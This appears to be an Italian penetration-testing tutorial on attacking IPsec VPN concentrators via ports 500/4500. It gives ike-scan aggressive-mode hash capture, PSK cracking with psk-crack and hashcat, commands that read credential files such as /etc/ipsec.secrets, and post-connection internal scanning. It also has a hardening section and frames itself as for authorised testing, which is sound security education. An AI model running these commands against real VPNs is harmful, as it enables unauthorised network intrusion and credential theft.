networking

Porta 4500 IPsec NAT-T: VPN, IKE e PSK Cracking

Porta 4500 IPsec NAT-T: VPN, IKE e PSK Cracking

Porta 4500 IPsec NAT-T nel pentest: IKE, NAT traversal, aggressive mode, PSK cracking e analisi della superficie VPN esposta.

  • Pubblicato il 2026-04-14
  • Tempo di lettura: 3 min

La porta 4500 UDP è usata da IPsec NAT-Traversal (NAT-T), il meccanismo che permette ai tunnel VPN IPsec di funzionare attraverso dispositivi NAT. Quando un client VPN si trova dietro un router con NAT, il protocollo IKE sulla porta 500 negozia la connessione e poi il traffico ESP viene incapsulato in UDP sulla porta 4500 per attraversare il NAT. Nel penetration testing, trovare la 4500 aperta conferma la presenza di un concentratore VPN IPsec — il punto di ingresso nella rete corporate. Il valore non è attaccare IPsec in sé (crittograficamente robusto se configurato bene), ma cercare misconfiguration: IKE aggressive mode che espone hash PSK crackabili, Pre-Shared Key deboli e credenziali VPN bruteforcabili.

La porta 4500 lavora sempre in coppia con la 500 (IKE). Se trovi la 4500, scansiona anche la 500 — lì avviene la negoziazione che puoi attaccare.

Come Funziona IPsec NAT-T #

text
Client VPN (dietro NAT)            Concentratore VPN
┌──────────────┐                   ┌──────────────────┐
│ 192.168.1.5  │                   │ VPN Gateway      │
│              │                   │ 203.0.113.10     │
│ IKE (:500)   │ ── negotiate ──► │ IKE (:500)       │
│ NAT-T (:4500)│ ── ESP in UDP ──►│ NAT-T (:4500)    │
│              │ ◄── tunnel ──────│ Rete interna:    │
│              │   10.10.0.0/16   │ 10.10.0.0/16     │
└──────────────┘                   └──────────────────┘

Senza NAT-T, il protocollo ESP non può attraversare il NAT perché non ha porte TCP/UDP. NAT-T incapsula ESP dentro pacchetti UDP sulla porta 4500.

1. Enumerazione #

Nmap #

bash
nmap -sU -p 500,4500 10.10.10.40
text
PORT     STATE SERVICE
500/udp  open  isakmp
4500/udp open  ipsec-nat-t

ike-scan — Fingerprinting del concentratore #

bash
ike-scan -M 10.10.10.40
text
10.10.10.40     Main Mode Handshake returned
    SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK)
    VID=1f07f70eaa6514d3b0fa96542a500407 (Cisco Unity)

Intelligence: Auth=PSK (crackabile), 3DES (debole), Cisco Unity (è un ASA), Group 2 (DH 1024-bit, debole).

ike-scan aggressive mode — Cattura hash PSK #

bash
ike-scan -M --aggressive -P handshake.txt 10.10.10.40

Aggressive mode invia l’hash della Pre-Shared Key nel primo pacchetto — intercettabile e crackabile offline.

Identificare il vendor #

bash
ike-scan -M --showbackoff 10.10.10.40

Il pattern di backoff identifica: Cisco, Juniper, Fortinet, StrongSwan.

2. PSK Cracking #

Se il concentratore supporta aggressive mode, l’hash catturato è crackabile.

bash
# psk-crack (ike-scan suite)
psk-crack -d /usr/share/wordlists/rockyou.txt handshake.txt
text
Key "VPN_Corp2025!" matches handshake
bash
# hashcat mode 5300 (IKEv1 aggressive mode PSK)
hashcat -m 5300 handshake.hash /usr/share/wordlists/rockyou.txt

PSK trovata → puoi connetterti alla VPN.

3. Credenziali VPN da Altre Fonti #

Molti concentratori VPN richiedono anche credenziali utente (XAUTH) oltre alla PSK:

bash
# Cerca file di configurazione VPN su host compromessi
find / -name "*.pcf" -o -name "*.ovpn" -o -name "ipsec.secrets" 2>/dev/null
bash
# ipsec.secrets contiene le PSK in chiaro
cat /etc/ipsec.secrets
text
10.10.10.40 : PSK "VPN_Corp2025!"
bash
# File .pcf (Cisco VPN client) — password offuscata ma decifrabile
cat vpn_profile.pcf | grep enc_GroupPwd
# Decodifica con cisco-decrypt

Le credenziali VPN spesso coincidono con quelle di Active Directory (LDAP auth), o si trovano in repository SVN/Git, share NFS, dump database o email di phishing.

4. Dentro la VPN — Post-Connection #

bash
# Connessione con StrongSwan
ipsec up corp-vpn

# Verifica subnet assegnata
ip addr show
ip route

Ora sei nella rete interna. Target prioritari: Domain Controller, RDP, SMB, MySQL.

bash
nmap -sn 10.10.0.0/16
nmap -sV -p- 10.10.10.0/24

5. Detection & Hardening #

  • Disabilita aggressive mode — usa solo main mode (non espone hash PSK)
  • IKEv2 al posto di IKEv1 — più sicuro, niente aggressive mode
  • PSK forte (20+ caratteri random) o meglio certificati
  • MFA per XAUTH — non solo username/password
  • DH Group 14+ (2048-bit) — non Group 2
  • AES-256 invece di 3DES
  • Monitora tentativi VPN falliti (brute force indicator)

6. Cheat Sheet Finale #

AzioneComando
Nmapnmap -sU -p 500,4500 target
IKE fingerprintike-scan -M target
Aggressive modeike-scan -M --aggressive -P handshake.txt target
Vendor detectike-scan -M --showbackoff target
PSK crackpsk-crack -d wordlist handshake.txt
Hashcat IKEv1hashcat -m 5300 hash wordlist
Cerca PSKcat /etc/ipsec.secrets
Cerca config VPNfind / -name "*.pcf" -o -name "*.ovpn"

Riferimento: RFC 3947 (NAT-T), ike-scan documentation, Cisco ASA security guides. Uso esclusivo in ambienti autorizzati. https://sendthepayload.com/fixing-ipsec-tunnels-with-nat-traversal-nat-t/

hackita.it/supportohackita.it/servizi.

#IPsec NAT-T #IKEv1 Aggressive Mode #VPN PSK

DIVENTA PARTE DELL’ÉLITE DELL’HACKING ETICO.

Accedi a risorse avanzate, lab esclusivi e strategie usate dai veri professionisti della cybersecurity.

Non sono un robot

Iscrivendoti accetti di ricevere la newsletter di HACKITA. Ti puoi disiscrivere in qualsiasi momento.